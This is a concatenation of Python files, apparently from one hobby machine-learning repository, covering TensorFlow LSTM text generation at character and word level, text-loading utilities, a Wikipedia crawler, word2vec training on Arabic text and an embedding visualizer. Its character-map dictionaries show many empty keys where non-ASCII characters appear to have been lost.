model.add(Dense(1))
model.add(Activation('sigmoid'))
model.summary()
print("Compiling model ...")
# tensorboard = TensorBoard(log_dir=f"logs/{NAME}")
model.compile(loss="binary_crossentropy",
optimizer="rmsprop",
metrics=['accuracy'])
print("Training...")
model.fit(X, y, batch_size=64, epochs=30, validation_split=0.2, callbacks=[checkpoint])
### Hyper Parameters ###
batch_size = 256 # Sequences per batch
num_steps = 70 # Number of sequence steps per batch
lstm_size = 256 # Size of hidden layers in LSTMs
num_layers = 2 # Number of LSTM layers
learning_rate = 0.003 # Learning rate
keep_prob = 0.3 # Dropout keep probability
epochs = 20
# Print losses every N interations
print_every_n = 100
# Save every N iterations
save_every_n = 500
NUM_THREADS = 12
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=1,
inter_op_parallelism_threads=1,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import train_chars
import numpy as np
import keyboard
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
model = train_chars.CharRNN(len(char2int_target), lstm_size=train_chars.lstm_size, sampling=True)
saver = train_chars.tf.train.Saver()
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def write_sample(checkpoint, lstm_size, vocab_size, char2int, int2char, prime="import"):
# samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, vocab_size)
char = int2char[c]
keyboard.write(char)
time.sleep(0.01)
# samples.append(char)
while True:
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, vocab_size)
char = int2char[c]
keyboard.write(char)
time.sleep(0.01)
# samples.append(char)
# return ''.join(samples)ss", "as"
if __name__ == "__main__":
# checkpoint = train_chars.tf.train_chars.latest_checkpoint("checkpoints")
# print(checkpoint)
checkpoint = "checkpoints/i6291_l256.ckpt"
print()
f = open("generates/python.txt", "a", encoding="utf8")
int2char_target = { v:k for k, v in char2int_target.items() }
import time
time.sleep(2)
write_sample(checkpoint, train_chars.lstm_size, len(char2int_target), char2int_target, int2char_target, prime="#"*100)
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import train_chars
import numpy as np
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
model = train_chars.CharRNN(len(char2int_target), lstm_size=train_chars.lstm_size, sampling=True)
saver = train_chars.tf.train.Saver()
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, char2int, int2char, prime="The"):
samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, vocab_size)
samples.append(int2char[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, vocab_size)
char = int2char[c]
samples.append(char)
# if i == n_samples - 1 and char != " " and char != ".":
# if i == n_samples - 1 and char != " ":
# # while char != "." and char != " ":
# while char != " ":
# x[0,0] = c
# feed = {model.inputs: x,
# model.keep_prob: 1.,
# model.initial_state: new_state}
# preds, new_state = sess.run([model.prediction, model.final_state],
# feed_dict=feed)
# c = pick_top_n(preds, vocab_size)
# char = int2char[c]
# samples.append(char)
return ''.join(samples)
if __name__ == "__main__":
# checkpoint = train_chars.tf.train_chars.latest_checkpoint("checkpoints")
# print(checkpoint)
checkpoint = "checkpoints/i6291_l256.ckpt"
print()
f = open("generates/python.txt", "a", encoding="utf8")
int2char_target = { v:k for k, v in char2int_target.items() }
for prime in ["#"*100]:
samp = sample(checkpoint, 5000, train_chars.lstm_size, len(char2int_target), char2int_target, int2char_target, prime=prime)
print(samp, file=f)
print(samp)
print("="*50)
print("="*50, file=f)
import numpy as np
import train_words
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, prime=["The"]):
samples = [c for c in prime]
model = train_words.CharRNN(len(train_words.vocab), lstm_size=lstm_size, sampling=True)
saver = train_words.tf.train.Saver()
with train_words.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = train_words.vocab_to_int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_words.vocab))
samples.append(train_words.int_to_vocab[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_words.vocab))
char = train_words.int_to_vocab[c]
samples.append(char)
return ' '.join(samples)
if __name__ == "__main__":
# checkpoint = train_words.tf.train_words.latest_checkpoint("checkpoints")
# print(checkpoint)
checkpoint = f"{train_words.CHECKPOINT}/i8000_l128.ckpt"
samp = sample(checkpoint, 400, train_words.lstm_size, len(train_words.vocab), prime=["the", "very"])
print(samp)
import tensorflow as tf
import numpy as np
def get_batches(arr, batch_size, n_steps):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
for n in range(0, arr.shape[1], n_steps):
x = arr[:, n: n+n_steps]
y_temp = arr[:, n+1:n+n_steps+1]
y = np.zeros(x.shape, dtype=y_temp.dtype)
y[:, :y_temp.shape[1]] = y_temp
yield x, y
# batches = get_batches(encoded, 10, 50)
# x, y = next(batches)
def build_inputs(batch_size, num_steps):
''' Define placeholders for inputs, targets, and dropout
Arguments
---------
batch_size: Batch size, number of sequences per batch
num_steps: Number of sequence steps in a batch
'''
# Declare placeholders we'll feed into the graph
inputs = tf.placeholder(tf.int32, shape=(batch_size, num_steps), name="inputs")
targets = tf.placeholder(tf.int32, shape=(batch_size, num_steps), name="targets")
# Keep probability placeholder for drop out layers
keep_prob = tf.placeholder(tf.float32, name="keep_prob")
return inputs, targets, keep_prob
def build_lstm(lstm_size, num_layers, batch_size, keep_prob):
''' Build LSTM cell.
Arguments
---------
lstm_size: Size of the hidden layers in the LSTM cells
num_layers: Number of LSTM layers
batch_size: Batch size
keep_prob: Scalar tensor (tf.placeholder) for the dropout keep probability
'''
### Build the LSTM Cell
def build_cell():
# Use a basic LSTM cell
lstm = tf.contrib.rnn.BasicLSTMCell(lstm_size)
# Add dropout to the cell outputs
drop_lstm = tf.contrib.rnn.DropoutWrapper(lstm, output_keep_prob=keep_prob)
return drop_lstm
# Stack up multiple LSTM layers, for deep learning
# build num_layers layers of lstm_size LSTM Cells
cell = tf.contrib.rnn.MultiRNNCell([build_cell() for _ in range(num_layers)])
initial_state = cell.zero_state(batch_size, tf.float32)
return cell, initial_state
def build_output(lstm_output, in_size, out_size):
''' Build a softmax layer, return the softmax output and logits.
Arguments
---------
lstm_output: List of output tensors from the LSTM layer
in_size: Size of the input tensor, for example, size of the LSTM cells
out_size: Size of this softmax layer
'''
# Reshape output so it's a bunch of rows, one row for each step for each sequence.
# Concatenate lstm_output over axis 1 (the columns)
seq_output = tf.concat(lstm_output, axis=1)
# Reshape seq_output to a 2D tensor with lstm_size columns
x = tf.reshape(seq_output, (-1, in_size))
# Connect the RNN outputs to a softmax layer
with tf.variable_scope('softmax'):
# Create the weight and bias variables here
softmax_w = tf.Variable(tf.truncated_normal((in_size, out_size), stddev=0.1))
softmax_b = tf.Variable(tf.zeros(out_size))
# Since output is a bunch of rows of RNN cell outputs, logits will be a bunch
# of rows of logit outputs, one for each step and sequence
logits = tf.matmul(x, softmax_w) + softmax_b
# Use softmax to get the probabilities for predicted characters
out = tf.nn.softmax(logits, name="predictions")
return out, logits
def build_loss(logits, targets, num_classes):
''' Calculate the loss from the logits and the targets.
Arguments
---------
logits: Logits from final fully connected layer
targets: Targets for supervised learning
num_classes: Number of classes in targets
'''
# One-hot encode targets and reshape to match logits, one row per sequence per step
y_one_hot = tf.one_hot(targets, num_classes)
y_reshaped = tf.reshape(y_one_hot, logits.get_shape())
# Softmax cross entropy loss
loss = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=y_reshaped)
loss = tf.reduce_mean(loss)
return loss
def build_optimizer(loss, learning_rate, grad_clip):
''' Build optmizer for training, using gradient clipping.
Arguments:
loss: Network loss
learning_rate: Learning rate for optimizer
grad_clip: threshold for preventing gradient exploding
'''
# Optimizer for training, using gradient clipping to control exploding gradients
tvars = tf.trainable_variables()
grads, _ = tf.clip_by_global_norm(tf.gradients(loss, tvars), grad_clip)
train_op = tf.train.AdamOptimizer(learning_rate)
optimizer = train_op.apply_gradients(zip(grads, tvars))
return optimizer
class CharRNN:
def __init__(self, num_classes, batch_size=64, num_steps=50,
lstm_size=128, num_layers=2, learning_rate=0.001,
grad_clip=5, sampling=False):
# When we're using this network for sampling later, we'll be passing in
# one character at a time, so providing an option for that
if sampling:
batch_size, num_steps = 1, 1
else:
batch_size, num_steps = batch_size, num_steps
tf.reset_default_graph()
# Build the input placeholder tensors
self.inputs, self.targets, self.keep_prob = build_inputs(batch_size, num_steps)
# Build the LSTM cell
# (lstm_size, num_layers, batch_size, keep_prob)
cell, self.initial_state = build_lstm(lstm_size, num_layers, batch_size, self.keep_prob)
### Run the data through the RNN layers
# First, one-hot encode the input tokens
x_one_hot = tf.one_hot(self.inputs, num_classes)
# Run each sequence step through the RNN with tf.nn.dynamic_rnn
outputs, state = tf.nn.dynamic_rnn(cell, x_one_hot, initial_state=self.initial_state)
self.final_state = state
# Get softmax predictions and logits
# (lstm_output, in_size, out_size)
# There are lstm_size nodes in hidden layers, and the number
# of the total characters as num_classes (i.e output layer)
self.prediction, self.logits = build_output(outputs, lstm_size, num_classes)
# Loss and optimizer (with gradient clipping)
# (logits, targets, lstm_size, num_classes)
self.loss = build_loss(self.logits, self.targets, num_classes)
# (loss, learning_rate, grad_clip)
self.optimizer = build_optimizer(self.loss, learning_rate, grad_clip)
from time import perf_counter
from collections import namedtuple
from parameters import *
from train import *
from utils import get_time, get_text
import tqdm
import numpy as np
import os
import string
import tensorflow as tf
if __name__ == "__main__":
CHECKPOINT = "checkpoints"
if not os.path.isdir(CHECKPOINT):
os.mkdir(CHECKPOINT)
vocab, int2char, char2int, text = get_text(char_level=True,
files=["E:\\datasets\\python_code_small.py", "E:\\datasets\\my_python_code.py"],
load=False,
lower=False,
save_index=4)
print(char2int)
encoded = np.array([char2int[c] for c in text])
print("[*] Total characters :", len(text))
print("[*] Number of classes :", len(vocab))
model = CharRNN(num_classes=len(vocab), batch_size=batch_size, num_steps=num_steps,
lstm_size=lstm_size, num_layers=num_layers,
learning_rate=learning_rate)
saver = tf.train.Saver(max_to_keep=100)
with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=NUM_THREADS)) as sess:
sess.run(tf.global_variables_initializer())
# Use the line below to load a checkpoint and resume training
saver.restore(sess, f'{CHECKPOINT}/e13_l256.ckpt')
total_steps = len(encoded) // batch_size // num_steps
for e in range(14, epochs):
# Train network
cs = 0
new_state = sess.run(model.initial_state)
min_loss = np.inf
batches = tqdm.tqdm(get_batches(encoded, batch_size, num_steps),
f"Epoch= {e+1}/{epochs} - {cs}/{total_steps}",
total=total_steps)
for x, y in batches:
cs += 1
start = perf_counter()
feed = {model.inputs: x,
model.targets: y,
model.keep_prob: keep_prob,
model.initial_state: new_state}
batch_loss, new_state, _ = sess.run([model.loss,
model.final_state,
model.optimizer],
feed_dict=feed)
batches.set_description(f"Epoch: {e+1}/{epochs} - {cs}/{total_steps} loss:{batch_loss:.2f}")
saver.save(sess, f"{CHECKPOINT}/e{e}_l{lstm_size}.ckpt")
print("Loss:", batch_loss)
saver.save(sess, f"{CHECKPOINT}/i{cs}_l{lstm_size}.ckpt")
from time import perf_counter
from collections import namedtuple
from colorama import Fore, init
# local
from parameters import *
from train import *
from utils import get_time, get_text
init()
GREEN = Fore.GREEN
RESET = Fore.RESET
import numpy as np
import os
import tensorflow as tf
import string
CHECKPOINT = "checkpoints_words"
files = ["carroll-alice.txt", "text.txt", "text8.txt"]
if not os.path.isdir(CHECKPOINT):
os.mkdir(CHECKPOINT)
vocab, int2word, word2int, text = get_text("data", files=files)
encoded = np.array([word2int[w] for w in text])
del text
if __name__ == "__main__":
def calculate_time():
global time_took
global start
global total_time_took
global times_took
global avg_time_took
global time_estimated
global total_steps
time_took = perf_counter() - start
total_time_took += time_took
times_took.append(time_took)
avg_time_took = sum(times_took) / len(times_took)
time_estimated = total_steps * avg_time_took - total_time_took
model = CharRNN(num_classes=len(vocab), batch_size=batch_size, num_steps=num_steps,
lstm_size=lstm_size, num_layers=num_layers,
learning_rate=learning_rate)
saver = tf.train.Saver(max_to_keep=100)
with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=NUM_THREADS)) as sess:
sess.run(tf.global_variables_initializer())
# Use the line below to load a checkpoint and resume training
# saver.restore(sess, f'{CHECKPOINT}/i3524_l128_loss=1.36.ckpt')
# calculate total steps
total_steps = epochs * len(encoded) / (batch_size * num_steps)
time_estimated = "N/A"
times_took = []
total_time_took = 0
current_steps = 0
progress_percentage = 0
for e in range(epochs):
# Train network
new_state = sess.run(model.initial_state)
min_loss = np.inf
for x, y in get_batches(encoded, batch_size, num_steps):
current_steps += 1
start = perf_counter()
feed = {model.inputs: x,
model.targets: y,
model.keep_prob: keep_prob,
model.initial_state: new_state}
batch_loss, new_state, _ = sess.run([model.loss,
model.final_state,
model.optimizer],
feed_dict=feed)
progress_percentage = current_steps * 100 / total_steps
if batch_loss < min_loss:
# saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}_loss={batch_loss:.2f}.ckpt")
min_loss = batch_loss
calculate_time()
print(f'{GREEN}[{progress_percentage:.2f}%] Epoch: {e+1:3}/{epochs} Training loss: {batch_loss:2.4f} - {time_took:2.4f} s/batch - ETA: {get_time(time_estimated)}{RESET}')
continue
if (current_steps % print_every_n == 0):
calculate_time()
print(f'[{progress_percentage:.2f}%] Epoch: {e+1:3}/{epochs} Training loss: {batch_loss:2.4f} - {time_took:2.4f} s/batch - ETA: {get_time(time_estimated)}', end='\r')
if (current_steps % save_every_n == 0):
saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}.ckpt")
saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}.ckpt")
import tqdm
import os
import inflect
import glob
import pickle
import sys
from string import punctuation, whitespace
p = inflect.engine()
UNK = "<unk>"
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
def get_time(seconds, form="{hours:02}:{minutes:02}:{seconds:02}"):
try:
seconds = int(seconds)
except:
return seconds
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
months, days = divmod(days, 30)
years, months = divmod(months, 12)
if days:
form = "{days}d " + form
if months:
form = "{months}m " + form
elif years:
form = "{years}y " + form
return form.format(**locals())
def get_text(path="data",
files=["carroll-alice.txt", "text.txt", "text8.txt"],
load=True,
char_level=False,
lower=True,
save=True,
save_index=1):
if load:
# check if any pre-cleaned saved data exists first
pickle_files = glob.glob(os.path.join(path, "text_data*.pickle"))
if len(pickle_files) == 1:
return pickle.load(open(pickle_files[0], "rb"))
elif len(pickle_files) > 1:
sizes = [ get_size(os.path.getsize(p)) for p in pickle_files ]
s = ""
for i, (file, size) in enumerate(zip(pickle_files, sizes), start=1):
s += str(i) + " - " + os.path.basename(file) + f" ({size}) \n"
choice = int(input(f"""Multiple data corpus found:
{s}
99 - use and clean .txt files
Please choose one: """))
if choice != 99:
chosen_file = pickle_files[choice-1]
print("[*] Loading pickled data...")
return pickle.load(open(chosen_file, "rb"))
text = ""
for file in tqdm.tqdm(files, "Loading data"):
file = os.path.join(path, file)
with open(file) as f:
if lower:
text += f.read().lower()
else:
text += f.read()
print(len(text))
punc = set(punctuation)
# text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c not in punc ])
text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c in char2int_target ])
# for ws in whitespace:
# text = text.replace(ws, " ")
if char_level:
text = list(text)
else:
text = text.split()
# new_text = []
new_text = text
# append = new_text.append
# co = 0
# if char_level:
# k = 0
# for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
# if not text[i].isdigit():
# append(text[i])
# k = 0
# else:
# # if this digit is mapped to a word already using
# # the below method, then just continue
# if k >= 1:
# k -= 1
# continue
# # if there are more digits following this character
# # k = 0
# digits = ""
# while text[i+k].isdigit():
# digits += text[i+k]
# k += 1
# w = p.number_to_words(digits).replace("-", " ").replace(",", "")
# for c in w:
# append(c)
# co += 1
# else:
# for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
# # convert digits to words
# # (i.e '7' to 'seven')
# if text[i].isdigit():
# text[i] = p.number_to_words(text[i]).replace("-", " ")
# append(text[i])
# co += 1
# else:
# append(text[i])
vocab = sorted(set(new_text))
print(f"alices in vocab:", "alices" in vocab)
# print(f"Converted {co} digits to words.")
print(f"Total vocabulary size:", len(vocab))
int2word = { i:w for i, w in enumerate(vocab) }
word2int = { w:i for i, w in enumerate(vocab) }
if save:
pickle_filename = os.path.join(path, f"text_data_{save_index}.pickle")
print("Pickling data for future use to", pickle_filename)
pickle.dump((vocab, int2word, word2int, new_text), open(pickle_filename, "wb"))
return vocab, int2word, word2int, new_text
def get_size(size, suffix="B"):
factor = 1024
for unit in ['', 'K', 'M', 'G', 'T', 'P']:
if size < factor:
return "{:.2f}{}{}".format(size, unit, suffix)
size /= factor
return "{:.2f}{}{}".format(size, "E", suffix)
import wikipedia
from threading import Thread
def gather(page_name):
print(f"Crawling {page_name}")
page = wikipedia.page(page_name)
filename = page_name.replace(" ", "_")
print(page.content, file=open(f"data/{filename}.txt", 'w', encoding="utf-8"))
print(f"Done crawling {page_name}")
for i in range(5):
Thread(target=gather, args=(page.links[i],)).start()
if __name__ == "__main__":
pages = ["Relativity"]
for page in pages:
gather(page)
# from keras.preprocessing.text import Tokenizer
from utils import chunk_seq
from collections import Counter
from nltk.corpus import stopwords
from keras.preprocessing.sequence import pad_sequences
import numpy as np
import gensim
sequence_length = 200
embedding_dim = 200
# window_size = 7
# vector_dim = 300
# epochs = 1000
# valid_size = 16 # Random set of words to evaluate similarity on.
# valid_window = 100 # Only pick dev samples in the head of the distribution.
# valid_examples = np.random.choice(valid_window, valid_size, replace=False)
with open("data/quran_cleaned.txt", encoding="utf8") as f:
text = f.read()
# print(text[:500])
ayat = text.split(".")
words = []
for ayah in ayat:
words.append(ayah.split())
# print(words[:5])
# stop words
stop_words = stopwords.words("arabic")
# most common come at the top
# vocab = [ w[0] for w in Counter(words).most_common() if w[0] not in stop_words]
# words = [ word for word in words if word not in stop_words]
new_words = []
for ayah in words:
new_words.append([ w for w in ayah if w not in stop_words])
# print(len(vocab))
# n = len(words) / sequence_length
# # split text to n sequences
# print(words[:10])
# words = chunk_seq(words, len(ayat))
vocab = []
for ayah in new_words:
for w in ayah:
vocab.append(w)
vocab = sorted(set(vocab))
vocab2int = {w: i for i, w in enumerate(vocab, start=1)}
int2vocab = {i: w for i, w in enumerate(vocab, start=1)}
encoded_words = []
for ayah in new_words:
encoded_words.append([ vocab2int[w] for w in ayah ])
encoded_words = pad_sequences(encoded_words)
# print(encoded_words[10])
words = []
for seq in encoded_words:
words.append([ int2vocab[w] if w != 0 else "_unk_" for w in seq ])
# print(words[:5])
# # define model
print("Training Word2Vec Model...")
model = gensim.models.Word2Vec(sentences=words, size=embedding_dim, workers=7, min_count=1, window=6)
path_to_save = r"E:\datasets\word2vec_quran.txt"
print("Saving model...")
model.wv.save_word2vec_format(path_to_save, binary=False)
# print(dir(model))
from keras.layers import Embedding, LSTM, Dense, Activation, BatchNormalization
from keras.layers import Flatten
from keras.models import Sequential
from preprocess import words, vocab, sequence_length, sequences, vector_dim
from preprocess import window_size
model = Sequential()
model.add(Embedding(len(vocab), vector_dim, input_length=sequence_length))
model.add(Flatten())
model.add(Dense(1))
model.compile("adam", "binary_crossentropy")
model.fit()
def chunk_seq(seq, num):
avg = len(seq) / float(num)
out = []
last = 0.0
while last < len(seq):
out.append(seq[int(last):int(last + avg)])
last += avg
return out
def encode_words(words, vocab2int):
# encoded = [ vocab2int[word] for word in words ]
encoded = []
append = encoded.append
for word in words:
c = vocab2int.get(word)
if c:
append(c)
return encoded
def remove_stop_words(vocab):
# remove stop words
vocab.remove("the")
vocab.remove("of")
vocab.remove("and")
vocab.remove("in")
vocab.remove("a")
vocab.remove("to")
vocab.remove("is")
vocab.remove("as")
vocab.remove("for")
# encoding: utf-8
"""
author: BrikerMan
contact: eliyar917gmail.com
blog: https://eliyar.biz
version: 1.0
license: Apache Licence
file: w2v_visualizer.py
time: 2017/7/30 9:37
"""
import sys
import os
import pathlib
import numpy as np
from gensim.models.keyedvectors import KeyedVectors
import tensorflow as tf
from tensorflow.contrib.tensorboard.plugins import projector
def visualize(model, output_path):
meta_file = "w2x_metadata.tsv"
placeholder = np.zeros((len(model.wv.index2word), model.vector_size))
with open(os.path.join(output_path, meta_file), 'wb') as file_metadata:
for i, word in enumerate(model.wv.index2word):
placeholder[i] = model[word]
# temporary solution for https://github.com/tensorflow/tensorflow/issues/9094
if word == '':
print("Emply Line, should replecaed by any thing else, or will cause a bug of tensorboard")
file_metadata.write("{0}".format('<Empty Line>').encode('utf-8') + b'\n')
else:
file_metadata.write("{0}".format(word).encode('utf-8') + b'\n')
